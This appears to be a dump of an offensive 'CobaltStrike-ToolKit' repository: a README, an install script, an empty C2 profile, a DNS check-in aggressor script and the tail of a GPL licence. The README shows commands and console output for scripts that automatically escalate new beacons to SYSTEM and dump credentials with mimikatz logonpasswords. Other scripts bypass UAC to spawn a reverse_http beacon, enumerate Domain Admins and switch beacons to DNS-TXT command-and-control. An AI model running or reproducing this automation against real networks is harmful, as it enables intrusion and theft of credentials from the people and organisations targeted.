wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | {description} 294 | Copyright (C) {year} {fullname} 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | {signature of Ty Coon}, 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | 341 | -------------------------------------------------------------------------------- /Malleable-C2-Profiles/googlesearch.profile: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CobaltStrike-ToolKit 2 | I’m sure there are better ways of doing all of this but as of right now there hasn’t been much put out so this will do :) 3 | 4 | ## Work Conducted by: 5 | - Alexander Rymdeko-Harvey [Twitter] @Killswitch-GUI -- [Web] CyberSydicates.com 6 | - Brian R [Twitter] @brian_psu 7 | 8 | ## CheckDA - Command 9 | 10 | Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. 11 | While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons. 12 | - Places a note on the beacon 13 | - Logs to the Event Log for team to see PID 14 | - uses a Pop up to alert opperator 15 | 16 | ### Usage 17 | Load up the Script: 18 | ``` 19 | aggressor> load /root/Tools/CobaltStrike-ToolKit/Initial-DACheck.cna 20 | [+] Load /root/Tools/CobaltStrike-ToolKit/Initial-DACheck.cna 21 | ``` 22 | When a initial beacon comes in you receive a pop up box and will see: 23 | ``` 24 | [*] Tasked beacon to import: /root/Tools/CobaltStrike-ToolKit/Invoke-DACheck.ps1 25 | [*] Tasked beacon to run: Invoke-DACheck -Initial True 26 | [+] host called home, sent: 2527 bytes 27 | [+] received output: 28 | Found-DA-User: admin 29 | ``` 30 | ### Independent Command: 31 | ``` 32 | beacon> checkda 33 | [*] Tasked beacon to import: /root/Tools/CobaltStrike-ToolKit/Invoke-DACheck.ps1 34 | [*] Tasked beacon to run: Invoke-DACheck 35 | [+] host called home, sent: 2519 bytes 36 | [+] received output: 37 | [!] Currently DA Context 38 | ``` 39 | ## CheckLA - Command 40 | 41 | Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent context. 42 | While using .NET 3.5 to perform Local Group enumeration and Token Context (PowerShell 2+ safe). This has the following context: 43 | 44 | 1. Checks for Initial Beacons Context (Elevated or Local Admin) 45 | 2. If the beacon is elevated it will Auto Getsystem, and run LogonPasswords 46 | 3. If the beacon in Local Admin but not in a high integrity process it will run Bypass UAC on that beacon 47 | 4. This will than launch a beacon in a high integrity beacon causing the first event to fire running LogonPasswords 48 | 49 | ### Usage 50 | Run this with all the other scripts 51 | ``` 52 | aggressor> load Initial-LAdminCheck.cna 53 | [+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna 54 | ``` 55 | when a Initial Beacon comes in: 56 | ``` 57 | aggressor> reload Initial-LAdminCheck.cna 58 | [+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna 59 | ``` 60 | If it returns as a Local Admin it will perform Bypass UAC: 61 | ``` 62 | [*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process 63 | [+] host called home, sent: 76304 bytes 64 | ``` 65 | The new beacon will run logonPassword as desired :) 66 | ``` 67 | [*] Tasked beacon to get SYSTEM 68 | [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command 69 | [+] host called home, sent: 444597 bytes 70 | [+] Impersonated NT AUTHORITY\SYSTEM 71 | [+] received output: 72 | ``` 73 | ### Independent Command 74 | ``` 75 | beacon> checkla 76 | [*] Tasked beacon to import: /root/Tools/CobaltStrike-ToolKit/CheckLAdminContext.ps1 77 | [*] Tasked beacon to run: Invoke-LocalAdminCheck 78 | [+] host called home, sent: 2622 bytes 79 | [+] received output: 80 | [!] Currently-in-LocalAdmin-Context 81 | ``` 82 | ## DA-Watch - Set of Commands 83 | 84 | Developed by @britz to perform the same DA monitoring but using all Aggressor script to perform DA Group checks (OPSEC). This has a few commands and requires you to update the list of DA members. this can be done with a few commands and is very effective way of checking for DA without loading PowerShell. On Pen-test's its not a big problem but on a red team OP this may be a No-Go. 85 | 86 | ### Usage 87 | load up the script 88 | ``` 89 | aggressor> load DA-Watch.cna 90 | [+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna 91 | ``` 92 | Run this command and it will populate the known DA list 93 | ``` 94 | shell net group /domain "Domain Admins" 95 | ``` 96 | ### uaddDA - Command 97 | Adds a user to the DA list 98 | ### uremDA - Command 99 | Removes a user from the DA list 100 | ### ulistDA - Command 101 | Prints a list of the current DA's to the Console 102 | ### uhookOn 103 | Sets the hook to follow beacon output to "On". This will watch all output for Shell net group... 104 | ### uhookOff 105 | Turns off the watch hook and set the follow beacon output to off. 106 | 107 | ### Credential Checks 108 | Every time a Cred is added to the Cred data model a credential is checked against the known list of creds. If it matches it posts to the event log! 109 | 110 | 111 | 112 | 113 | -------------------------------------------------------------------------------- /cs-install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # adapted from @christruncer 3 | # just and example 4 | wget https://www.cobaltstrike.com/downloads/a24a41fcae308883d74f3b57e36e5bbb/cobaltstrike-trial.tgz 5 | tar zxvf cobaltstrike-trial.tgz 6 | sudo apt-get update -y 7 | sudo apt-get install build-essential -y 8 | sudo add-apt-repository ppa:webupd8team/java -y 9 | sudo apt-get update -y 10 | sudo apt-get install oracle-java7-installer -y 11 | -------------------------------------------------------------------------------- /host/dnscheckin.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial_empty { 2 | bmode($1, "dns-txt"); 3 | bcheckin($1); 4 | bnote($1, "-needs to be evaluated!"); 5 | bsleep($1, 120, 20) 6 | } 7 | --------------------------------------------------------------------------------